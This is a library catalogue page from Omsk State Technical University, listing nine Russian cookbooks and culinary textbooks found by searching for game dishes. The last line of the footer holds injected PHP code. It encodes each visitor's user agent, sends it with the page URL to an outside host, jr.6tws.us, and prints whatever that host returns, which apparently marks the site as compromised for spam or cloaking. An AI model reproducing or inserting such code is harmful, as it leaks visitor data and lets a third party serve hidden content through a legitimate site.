Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

47 пользователей


Зарегистрированных: 1 

Скудин Иван Борисович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БЛЮДА ИЗ ДИЧИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 9
1. 
Уоррен Дж. Шотландская кухня [Текст] / Дж. Уоррен ; авт. предисл. В. В. Похлёбкин, 1983. - 73 с.
Держатели документа (Информация об экземплярах) 
2. 
Козлова С. Н. Кулинарная характеристика блюд [Текст] / С. Н. Козлова, Е. Ю. Фединишина, 2014. - 191 с.
Ключевые слова 
ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКА -- ПОЛУФАБРИКАТЫ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- БЛЮДА ЛЕЧЕБНОГО ПИТАНИЯ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА НАЦИОНАЛЬНОЙ КУХНИ -- КУХНЯ НАЦИОНАЛЬНАЯ -- ПИТАНИЕ ИНТУРИСТОВ -- БЛЮДА ЗАРУБЕЖНОЙ КУХНИ -- КУХНЯ ЗАРУБЕЖНАЯ
Держатели документа (Информация об экземплярах) 
3. 
Технология производства продукции общественного питания [Текст] / В. С. Баранов, А. И. Мглинец, Л. М. Алешина, 1986. - 400 с.
Ключевые слова 
ТЕХНОЛОГИЯ общественного питания -- АССОРТИМЕНТ ПРОДУКЦИИ -- ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ПОЛУФАБРИКАТОВ -- ПОРЦИОНИРОВАНИЕ КУЛИНАРНОЙ ПРОДУКЦИИ -- КАЧЕСТВО КУЛИНАРНОЙ ПРОДУКЦИИ -- ПОЛУФАБРИКАТЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- СУПЫ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ВОДНОГО СЫРЬЯ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА БЫСТРОЗАМОРОЖЕННЫЕ -- БЛЮДА ОХЛАЖДЕННЫЕ -- ПРОИЗВОДСТВО МУЧНЫХ ИЗДЕЛИЙ -- БЛЮДА МУЧНЫЕ -- ГАРНИР -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕЕ
Держатели документа (Информация об экземплярах) 
4. 
Фатов М. Ф. 1000 блюд ресторанной кухни [Текст] / М. Ф. Фатов, В. В. Холодков ; ред. Н. И. Ковалев, 1985. - 295 с.
Держатели документа (Информация об экземплярах) 
5. 
Харченко Н. Э. Сборник рецептур блюд и кулинарных изделий [Текст] : учеб. пособие для образовательных учреждений нач. проф. образования / Н. Э. Харченко, 2010. - 495 с.
Держатели документа (Информация об экземплярах) 
6. 
Барановский В. А. Повар [Текст] : учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Л. Г. Шатун, 2003. - 383 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- СУП -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ТЕСТО -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
7. 
Харченко Н. Э. Сборник рецептур блюд и кулинарных изделий [Текст] : учеб. пособие для образовательных учреждений нач. проф. образования / Н. Э. Харченко, 2005. - 495 с.
Держатели документа (Информация об экземплярах) 
8. 
Сборник рецептур кулинарных изделий и блюд [Текст] : сборник, 2006. - 749 с.
Держатели документа (Информация об экземплярах) 
9. 
Барановский В. А. Рецептурный справочник повара [Текст] : справочное издание / В. А. Барановский, 2003. - 379 с.
Ключевые слова 
ОБРАБОТКА ПРОДУКТОВ -- БЕЛКИ -- ЖИРЫ -- УГЛЕВОДЫ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ дичи -- БЛЮДА ИЗ кролика -- СОУС -- БЛЮДА СЛАДКИЕ -- ТЕСТО -- ФАРШ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.60 с.12 запросов, 0.34c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;